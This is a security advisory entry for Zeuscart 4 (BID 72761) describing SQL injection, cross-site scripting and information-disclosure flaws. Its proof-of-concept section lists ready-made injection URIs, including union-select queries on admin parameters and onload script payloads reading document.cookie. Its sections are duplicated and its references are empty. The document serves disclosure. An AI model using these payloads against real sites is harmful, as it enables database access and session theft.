Zeuscart Multiple Security Vulnerabilities
BID:72761
Info
Zeuscart Multiple Security Vulnerabilities
| Bugtraq ID: | 72761 |
| Class: | Input Validation Error |
| CVE: |
CVE-2015-2182 CVE-2015-2184 CVE-2015-2183 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2015 12:00AM |
| Updated: | Mar 19 2015 07:37AM |
| Credit: | Steffen Rösemann |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Zeuscart Multiple Security Vulnerabilities
Zeuscart is prone to multiple security vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or gain potentially sensitive information.
Zeuscart 4 is vulnerable; other versions may also be affected.
Zeuscart is prone to multiple security vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or gain potentially sensitive information.
Zeuscart 4 is vulnerable; other versions may also be affected.
Exploit / POC
Zeuscart Multiple Security Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
http://www.example.com/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--
http://www.example.com/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
http://www.example.com/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
http://www.example.com/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
http://www.example.com/admin/?do=getphpinfo
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
http://www.example.com/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--
http://www.example.com/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
http://www.example.com/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
http://www.example.com/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
http://www.example.com/admin/?do=getphpinfo
References
Zeuscart Multiple Security Vulnerabilities
References:
References: